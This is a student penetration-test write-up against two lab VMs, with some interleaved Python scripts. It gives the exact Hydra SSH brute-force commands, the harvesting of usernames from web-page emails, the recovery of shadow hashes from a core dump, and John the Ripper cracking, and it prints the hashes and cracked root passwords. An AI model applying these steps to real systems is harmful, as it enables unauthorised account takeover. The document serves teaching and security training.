Final Project Report [NTS330 – Final]

V1.0

Juan Ortega, [email protected]

4/26/2011


Document Properties

Title: Deviant Alert, Inc. Penetration Active Recon Report
Version: V1.0
Author: Juan Ortega
Pen-testers: Juan Ortega
Reviewed By:
Approved By:
Classification: Confidential

Version Control

Version | Date | Author | Description
V1.0 | April 26, 2011 | Juan Ortega | Final Draft

Disclaimer:

This penetration report is for educational purposes only. The penetration testing tools (enumeration, vulnerability scanning, and passive/active recon) were run against a private virtual network set up solely for the purpose of expanding my knowledge. Everything within this document is fictitious; any similarity to actual organizations or systems is purely coincidental.


1. Executive Summary

The two PenTest Lab Disk boxes were alike in some ways and different in others. The first box (1.100) exposed more services: Nessus reported several high-severity findings, and Metasploit had one matching exploit. None of those worked, but usernames taken from the email addresses on the HTTP server let Hydra brute-force the OpenSSH login, which yielded a first set of credentials. Once inside, a second user who was in the wheel group had to be cracked; with that password, a single 'sudo' command gave root privileges. The second box (1.110) started the same way, but it exposed an FTP server with anonymous login. After some exploring, a stale 'shadow' file and a 'core' file turned up in what appeared to be a backup directory. Running 'strings' over the core file to print its printable strings recovered the real shadow entries, and after cracking them with John the Ripper and a wordlist, root privileges were attained. Overall the exercise was challenging but neither too hard nor too easy.


Table of Contents

1. Executive Summary

Table of Illustrations

1.0 Project Objectives

2.0 Timeline

3.0 Summary of Findings

4.0 Summary of Recommendation

5.0 Detailed Findings

5.1 Level 1 – [PenTest Lab Disk 1.100]

5.1.1 Scope of Work

5.1.2 Assumptions

5.1.3 Findings (Figures are located in Appendix)

5.2 Level 2 – [PenTest Lab Disk 1.110]

5.2.1 Scope of Work

5.2.2 Assumptions

5.2.3 Findings (Figures are located in Appendix)

6.0 Appendix

7.0 References


Table of Illustrations

1.0 Project Objectives

1.1 The objectives are the following:

1.1.1 Break into PenTest Lab Disk 1.100 and attain root privileges, document your findings.

1.1.2 Break into PenTest Lab Disk 1.110 and attain root privileges, document your findings.

2.0 Timeline

The timeline of the test:

Penetration Testing | Start Date/Time | End Date/Time
Level 1 | 24 April 2010 | 26 April 2010
Level 2 | 24 April 2010 | 26 April 2010

Table 1 Control Testing Timeline

3.0 Summary of Findings

3.1 This box was not too hard to get into. Many ports were open to scan for vulnerabilities and experiment on. Nessus and Metasploit failed at the start, but a brute-force attack with dictionary passwords did the trick. Hydra, John the Ripper, and SSH were all that was needed to get into the system once the usernames were known from the HTTP server.

3.2 At first this box looked like the last one: the usernames were again on the HTTP server. Things went downhill when Hydra could not find an initial password. Since the FTP server was working, some investigation there was necessary. The 'download' directory looked like a backup from an older version, since some root-level directories were present. The /download/etc/shadow file looked promising, but the hash in it turned out to be for a password that did not work on this box (perhaps it was the backup for the other box). The only other interesting file was 'core', also found in /download/etc, which appeared to contain random data. A newly learned command, 'strings', parsed that data and printed the character text in it, revealing the actual shadow file entries. Brute-forcing the shadow file with John the Ripper's incremental mode was unsuccessful: the users had learned from the last box and increased the length of their passwords. They were still vulnerable to a dictionary attack, however, and the root and 'ccoffee' passwords were eventually recovered.

4.0 Summary of Recommendation

4.1 This box has many ports open that mostly do not seem to be in use. The ftp-data port is open but unusable, and the FTP server is up but broken. OpenSSH is outdated, as are the SMTP, POP3, and IMAP daemons. The web site displayed email addresses whose local parts were also usernames on the system; the HTTPS port was closed, so nothing could be done there. Recommendations: set up a host-based firewall to filter out the unused ports. Upgrade the OS, since it runs a very old kernel (2.6.16) that is exposed to local root privilege escalation. Display only one generic, non-user email address on the web server, or preferably take the site down or serve it over HTTPS only. For the old daemons (SMTP, POP3, IMAP), Nessus found some low and medium severity issues; watch those and keep the daemons updated, since a buffer overflow against one of them might well have worked.

4.2 Fewer ports were exposed on this box than on the last one, but there is still no firewall in place. Email addresses should not be published on the HTTP server again; they reveal every username and leave the accounts vulnerable to brute-force attacks. The FTP server should have the 'anonymous' user disabled, or at least chrooted and segregated from the rest of the file system; it certainly should not share a directory with the backups, which is just laziness. Lastly, the passwords were still very easy to crack because they were dictionary words. I recommend a password policy requiring more than 8 characters with both lower- and upper-case letters and numerals, and screening candidates against a wordlist, since a capitalized dictionary word still falls to John's rules.
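As an added illustration of that recommendation (my code, not the report's), here is a checker that applies the length and character-class rules and also rejects the two things these boxes fell to: the username used as the password (what Hydra's -e s tries) and a wordlist entry with only a capital letter, leet digits or trailing digits added (what John's --rules tries). The wordlist is a constructed handful of entries, not the list the report downloaded.

```python
import re

# Constructed mini wordlist; a real check would load the same list an attacker would use.
WORDLIST = {"complexity", "diatomaceous", "nostradamus", "tarot", "password", "bbanter"}

MIN_LEN = 9          # "over 8 characters"
_DIGITS = re.compile(r"[0-9]")
_UPPER = re.compile(r"[A-Z]")
_LOWER = re.compile(r"[a-z]")


def policy_failures(password):
    """Character-class rules from the recommendation; returns a list of failures (empty = pass)."""
    fails = []
    if len(password) < MIN_LEN:
        fails.append("shorter than %d characters" % MIN_LEN)
    if not _LOWER.search(password):
        fails.append("no lower-case letter")
    if not _UPPER.search(password):
        fails.append("no upper-case letter")
    if not _DIGITS.search(password):
        fails.append("no digit")
    return fails


def dictionary_base(password):
    """Undo the cheap mangling john --rules applies: case, trailing digits/symbols, leet digits."""
    base = password.lower()
    base = re.sub(r"[0-9!@#$%^&*.,_-]+$", "", base)                 # strip appended digits/symbols
    base = base.translate(str.maketrans("013457@$", "oleastas"))    # common leet substitutions
    return base


def is_dictionary_derived(password, wordlist):
    """True if the password is a wordlist entry, or one with trivial mangling applied."""
    return password.lower() in wordlist or dictionary_base(password) in wordlist


def evaluate(username, password, wordlist=WORDLIST):
    """All reasons a password should be rejected; an empty list means it is acceptable."""
    reasons = policy_failures(password)
    if password.lower() == username.lower():
        reasons.append("password equals username")
    if is_dictionary_derived(password, wordlist):
        reasons.append("derived from a wordlist entry")
    return reasons


if __name__ == "__main__":
    # The credentials recovered on the two boxes, plus one that passes.
    for user, pw in [("bbanter", "bbanter"), ("ccoffee", "Diatomaceous"),
                     ("root", "Complexity1"), ("aadams", "x7Q!mW2p#rL")]:
        print(user, pw, evaluate(user, pw) or "ok")
```

Note that "Complexity1" satisfies every character-class rule and would still be cracked in seconds; the wordlist check is the part of the policy that actually matters here.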

5.0 Detailed Findings

5.1 Level 1

5.1.1 Scope of Work

Download PenTest Lab Disk 1.100 from the forums.heorot.net web site and run it inside a VM. The scope is to obtain root privileges on the system by whatever means possible. In the scenario, you are proving to the CEO that more security is necessary and that their systems are vulnerable.

5.1.2 Assumptions


No assumptions are made. It is not clear how difficult the boxes will be to break into, but given what was learned from past exercises, this should be either a simple or a challenging task.

5.1.3 Findings (Figures are located in Appendix)

5.1.3.1 Reconnaissance

The first thing to do on a target system is to run a simple port scan.

1) $ nmap -n 192.168.1.100

Ports open: 20 (ftp-data), 21 (ftp), 22 (ssh), 25 (smtp), 80 (http), 110 (pop3), 143 (imap), 443 (https).

The Slax box had a number of open ports with outdated version numbers next to them (a plain nmap -n reports ports and service names only; version numbers come from -sV or from the Nessus scan). The next thing to try was whether Nessus picks anything up. As it turns out, Nessus found 7 high-severity vulnerabilities pertaining to the www service on port 80, most of them relating to outdated PHP. Nessus also found:

Apache mod_rewrite LDAP Protocol URL Handling Overflow, CVE-2006-3747

We then open Metasploit to look for exploits matching the vulnerabilities Nessus found. db_autopwn matched only one, the mod_rewrite exploit above; however, all of its payloads assume a Windows host, and the generic payloads would not work either, so Metasploit is of no use in this case.

Having failed with Metasploit, I turned to each of the services in turn. Since port 80 is open, browsing to http://192.168.1.100 reveals a page, and index2.php displays a list of email addresses at the bottom. The local parts of these addresses could serve as login names, so they were saved with the domain stripped off.

Users found:

marym, patrickp, thompsont, benedictb, genniege, michaelp, longe, adamsa, banter, coffee, banterb

Moving the trailing first initial to the front of each (last name + initial becomes initial + last name):

mmary, ppatrick, tthompson, bbenedict, egennieg, pmichael, elong, aasam, rbanter, ecoffe, bbanter
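As an added example (not part of the original report), here is a script that automates the two steps just described: pull the email addresses out of a saved copy of the page and turn each local part into the candidate login names for Hydra's -L file. The HTML below is constructed from three of the local parts listed above under an assumed domain; the lab's real index2.php is not reproduced.

```python
import re

# Constructed sample of the kind of page index2.php showed; the domain is
# assumed, only the local parts come from the report.
SAMPLE_HTML = """
<p>Staff: <a href="mailto:adamsa@deviantalert.example">Adams</a>,
<a href="mailto:banterb@deviantalert.example">Banter</a>,
<a href="mailto:coffee@deviantalert.example">Coffee</a>,
<a href="mailto:info@deviantalert.example">info</a>.
Questions? Write to adamsa@deviantalert.example.</p>
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Role mailboxes that are unlikely to be real shell accounts.
GENERIC_LOCALS = {"info", "admin", "webmaster", "postmaster", "sales", "support", "contact"}


def extract_local_parts(html):
    """Unique, lower-cased local parts of the addresses in html, in page order."""
    found = []
    for addr in EMAIL_RE.findall(html):
        local = addr.split("@", 1)[0].lower()
        if local in GENERIC_LOCALS or local in found:
            continue
        found.append(local)
    return found


def candidates(local):
    """Login names to try for one local part.

    The lab's addresses were lastname + first initial ("adamsa") while the
    shell accounts were first initial + lastname ("aadams"). Keep the original
    too, since a site may use either convention.
    """
    names = [local]
    if len(local) > 1 and local.isalpha():
        names.append(local[-1] + local[:-1])
    return names


def username_list(html):
    """Flat, de-duplicated list suitable for a hydra -L file."""
    out = []
    for local in extract_local_parts(html):
        for name in candidates(local):
            if name not in out:
                out.append(name)
    return out


if __name__ == "__main__":
    names = username_list(SAMPLE_HTML)
    with open("usernames.txt", "w") as fh:       # feed this to: hydra -L usernames.txt ...
        fh.write("\n".join(names) + "\n")
    print("\n".join(names))
```

The transform is deliberately mechanical, which is why "coffee" becomes "ecoffe" rather than the real account "ccoffee": the address list alone cannot tell you whether a trailing letter is an initial, so both forms go into the list and Hydra sorts it out.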


5.1.3.2 Attack

The FTP server does not seem to be working. The OpenSSH server is up. SMTP does not reveal any vulnerability, the POP3 (110) daemon has no critical vulnerabilities, so there is not much to do there, and port 443 (https) turned out to be closed. All that has been acquired so far is a list of usernames, so the remaining option is to brute-force OpenSSH.

# hydra 192.168.1.100 ssh2 -L /root/usernames2 -p password -e s -t 36

Hydra is a powerful brute-forcer supporting many protocols. The command above loads the usernames retrieved from the email addresses (-L), tries the single password 'password' (-p), and with '-e s' also tries each username as its own password. '-t 36' sets the number of parallel connections per target to 36; it is not a retry count. The 'ssh2' module name belongs to this older Hydra release; current versions call the module 'ssh'.

[22][ssh2] host: 192.168.1.100 login: bbanter password: bbanter

Success, the login name for bbanter is also the password.

$ ssh bbanter@192.168.1.100

password: bbanter

bbanter@slax:~$

The login was successful, giving control over the box with limited privileges. The next step is to get a list of users.

bbanter@slax:~$ cat /etc/passwd

aadams:x:1000:10…:/home/aadams:/bin/bash

bbanter:x:1001:100:…/home/bbanter:/bin/bash

ccoffee:x:1002:100:…./home/ccoffee:/bin/bash

The user aadams has primary group 10, which on Slackware-based systems such as Slax is the wheel group. If /etc/sudoers grants %wheel the usual ALL=(ALL) ALL, this user can invoke 'sudo' and elevate to root.
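To make that group inference checkable rather than eyeballed, here is an added example (my code, not the report's) that parses /etc/passwd and /etc/group and lists the accounts that can plausibly escalate: uid 0, or membership in an administrative group by primary gid or by the supplementary member list. The file contents are constructed to mirror the entries shown above (the root line and the group file are my additions); the lab's real files are not reproduced, and the sudoers caveat in the docstring is exactly that, a caveat this code does not check.

```python
ADMIN_GROUPS = ("wheel", "sudo", "admin")

# Constructed from the report's /etc/passwd excerpt (GECOS and root line filled in by me).
PASSWD = """\
root:x:0:0::/root:/bin/bash
aadams:x:1000:10::/home/aadams:/bin/bash
bbanter:x:1001:100::/home/bbanter:/bin/bash
ccoffee:x:1002:100::/home/ccoffee:/bin/bash
"""

# Constructed /etc/group: gid 10 is wheel on Slackware/Slax, gid 100 is users.
GROUP = """\
root:x:0:
wheel:x:10:root
users:x:100:
"""


def parse_passwd(text):
    """name -> (uid, gid) for each well-formed 7-field line."""
    users = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not line.strip():
            continue
        users[parts[0]] = (int(parts[2]), int(parts[3]))
    return users


def parse_group(text):
    """name -> (gid, {supplementary members})."""
    groups = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 4 or not line.strip():
            continue
        members = {m for m in parts[3].split(",") if m}
        groups[parts[0]] = (int(parts[2]), members)
    return groups


def privileged_users(passwd_text, group_text, admin_groups=ADMIN_GROUPS):
    """Accounts that are uid 0 or belong to an admin group (primary or supplementary).

    Group membership only becomes root access if /etc/sudoers actually grants the
    group (for example '%wheel ALL=(ALL) ALL'); that file is not parsed here.
    """
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    admin_gids = {groups[g][0] for g in admin_groups if g in groups}
    result = {}
    for name, (uid, gid) in users.items():
        reasons = []
        if uid == 0:
            reasons.append("uid 0")
        if gid in admin_gids:
            reasons.append("primary gid %d" % gid)
        for g in admin_groups:
            if g in groups and name in groups[g][1]:
                reasons.append("member of %s" % g)
        if reasons:
            result[name] = reasons
    return result


if __name__ == "__main__":
    for name, why in privileged_users(PASSWD, GROUP).items():
        print(name, ", ".join(why))
```

On the box itself the same check is `grep -E ':(10|0):' /etc/passwd` plus `grep ^wheel /etc/group`, but the script also catches users added to wheel only through the member list, which the passwd file alone will not show.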

bbanter@slax:~$ uname -r

2.6.16

Because this is an old kernel, one option that came up was the 'vmsplice' local root exploit. The problem is that vmsplice only affects kernels 2.6.17 through 2.6.24.1, so the odds are it would not work here.


After uploading the vmsplice exploit with 'scp', all that was left was to execute it. As expected, it did not work and failed.

If finding bbanter's password was that easy, the same method might work on aadams. After downloading a wordlist from the web, Hydra was run again with that wordlist against this one user.

# hydra 192.168.1.100 ssh2 -l aadams -P /root/wordlist.txt

[22][ssh2] host: 192.168.1.100 login: aadams password: nostradamus

Again a success: Hydra found the password for aadams. Since aadams can invoke 'sudo', root access should now be obtainable.

$ ssh aadams@192.168.1.100

password: nostradamus

aadams@slax:~$ sudo cat /etc/shadow

password: nostradamus

root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::

Although root privileges have effectively been attained through sudo, it is still worth recovering the actual root password. Now that we have the hash, John the Ripper can crack it. First, 'unshadow' combines 'passwd' and 'shadow' into one file:

$ /usr/bin/john/unshadow passwd shadow > unshadow

$ sudo john --users=root -i=alpha unshadow

tarot (root)

The root password is: tarot

5.2 Level 2

5.2.1 Scope of Work

The scope of this exercise is to break into 192.168.1.110 and obtain root privileges. The scenario: since the CEO thought the last box was too easy, this new one has been "reconfigured" and should be a bit more difficult to get into. PenTest Lab Disk 1.110 will be loaded into a VM and attacked.

5.2.2 Assumptions

The last box was not too difficult, but the scenario describes this one as harder, so the outcome is unknowable. If the setup turns out to be the same, the same method as on the last box will be tried, but I expect it not to work.

5.2.3 Findings (Figures are located in Appendix)

5.2.3.1 Reconnaissance

The first thing to do is a port scan:

$ nmap -n 192.168.1.110

Ports revealed open: ftp (21), ssh (22), http (80), ipp (631).

The next step was to launch Nessus and see whether any vulnerabilities exist.

Nessus found 2 high vulnerabilities in www (80):

Apache 2.2 < 2.2.14 Multiple Vulnerabilities CVE-2009-2699

Apache 2.2 < 2.2.15 Multiple Vulnerabilities CVE-2009-3555

Unfortunately, there are no Metasploit exploits for these vulnerabilities. The next step is to look at the web site again.

Like the last exercise, a few usernames in emails were revealed:

adamsa, banterb, ccoffee, aadams, bbanter, ccoffee

5.2.3.2 Attack

Next, as last time, Hydra was tried.

# hydra 192.168.1.110 ssh2 -L /root/usernames3 -p password -e s -t 36

Unfortunately, Hydra found no account whose password was the same as its username. Looking back at the ports, FTP looks interesting: first see whether anonymous login works, and if not, try one of the usernames.

$ ftp 192.168.1.110

Name (192.168.1.110:anonymous): anonymous

230 Login successful.

ftp>

Anyone can log in anonymously to the FTP server, so it is time to explore. The download directory contains a shadow file with a salted root password hash; grab it and crack it.

ftp> get /download/etc/shadow

$ john -i=alpha shadow

tarot (root)

It looks like the root password was found, but that does not look right: it is the same password as on the last box. More investigation is necessary.

Back on the FTP server, /download/etc also contains a file called "core" that looks rather interesting.

ftp> get /download/etc/core

$ cat core

Running cat on the core file shows what looks like random data, nothing useful. After some digging on the Internet, there is a command called "strings" that prints the printable character sequences in a binary file.

$ strings core > usernames4

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::

aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

After a little trimming of the strings output, these salted hashes remain. The users root, aadams, bbanter, and ccoffee are active. Unfortunately there is no way to see which groups they belong to, so the only option is to crack the passwords.
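A core file is a memory dump of a process, so whatever that process had read, here the shadow file, sits in it as plain bytes, which is why 'strings' works and why the output then needs trimming. The added example below (my code, not the report's) does both steps: it emulates what 'strings' prints, printable runs of four or more bytes, then keeps only the runs that have the rigid shape of a shadow entry, splits each into its fields, and emits the 'user:hash' lines John needs. The core file here is constructed from the four hashes shown above embedded in filler bytes and a decoy passwd line; the real core from the lab is not reproduced.

```python
import re

PRINTABLE = set(range(0x20, 0x7F)) | {0x09}   # what GNU strings counts as graphic

# Shadow entry: name, $id$salt$hash, last-change day, then the remaining numeric/empty fields.
SHADOW_RE = re.compile(
    r"^([a-z_][a-z0-9_-]*):(\$[^:$]+\$[^:$]+\$[^:]+):(\d*)((?::\d*)+)$"
)

# Constructed stand-in for the lab's core file: the report's hashes wrapped in
# non-printable bytes, unrelated printable junk, and an /etc/passwd line that
# must NOT be mistaken for a shadow entry.
_FILLER = bytes(range(256))
SAMPLE_CORE = (
    _FILLER
    + b"root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::\n"
    + b"\x00\x01GCC: (GNU) 4.1.2\x00\x00"
    + b"aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::\n"
    + b"bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::\n"
    + _FILLER[:64] + b"\x00"
    + b"ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::\x00"
    + b"root:x:0:0::/root:/bin/bash\n"
    + _FILLER
)


def printable_runs(data, min_len=4):
    """Emulate `strings -n min_len`: maximal runs of printable bytes (tab counts, newline does not)."""
    runs, current = [], bytearray()
    for byte in data:
        if byte in PRINTABLE:
            current.append(byte)
        else:
            if len(current) >= min_len:
                runs.append(current.decode("ascii"))
            current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode("ascii"))
    return runs


def find_shadow_entries(data):
    """name -> dict of fields for every printable run that parses as a shadow line."""
    entries = {}
    for run in printable_runs(data):
        m = SHADOW_RE.match(run)
        if not m:
            continue
        name, crypt_str, lastchg, rest = m.groups()
        algo, salt, digest = crypt_str.split("$", 3)[1:]   # "$1$salt$digest"
        entries[name] = {
            "hash": crypt_str,
            "algo": algo,                 # "1" is md5crypt, which is what these are
            "salt": salt,
            "digest": digest,
            "lastchange": int(lastchg) if lastchg else None,
            "rest": rest.lstrip(":").split(":"),
        }
    return entries


def john_lines(entries):
    """'user:hash' lines, the minimum John needs for a shadow-style input file."""
    return ["%s:%s" % (name, e["hash"]) for name, e in entries.items()]


if __name__ == "__main__":
    found = find_shadow_entries(SAMPLE_CORE)
    with open("usernames4", "w") as fh:        # then: john --wordlist=... --rules usernames4
        fh.write("\n".join(john_lines(found)) + "\n")
    for line in john_lines(found):
        print(line)
```

The same filter on the command line is `strings core | grep -E '^[a-z_][a-z0-9_-]*:\$[0-9a-z]+\$'`; the script adds the field split so the last-change day and salt are available for the write-up.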

$ john -i=alpha usernames4

….

This is taking too long; the passwords are evidently longer than before, so a wordlist might be more useful.


$ john --rules --wordlist=wordlist.txt usernames4

Complexity (root)

Diatomaceous (ccoffee)

The next step is to log in over OpenSSH as ccoffee.

$ ssh ccoffee@192.168.1.110

password: Diatomaceous

Linux 2.6.16

ccoffee@slax:~$ su

password: Complexity

root@slax:~$

Success: root privileges are attained.


6.0 Appendix

6.1 Level 1

5.1.3.1 Reconnaissance

5.1.3.2 Attack


6.2 Level 2

5.2.3.1 Reconnaissance

5.2.3.2 Attack


7.0 References

1. THC-HYDRA – fast and flexible network login hacker. Retrieved April 26, 2011, from the THC Web site: http://www.thc.org/thc-hydra/

2. John the Ripper password cracker. Retrieved April 26, 2011, from the Openwall Web site: http://www.openwall.com/john/

3. Kevin's Word List Page. Retrieved April 26, 2011, from the SourceForge Web site: http://wordlist.sourceforge.net/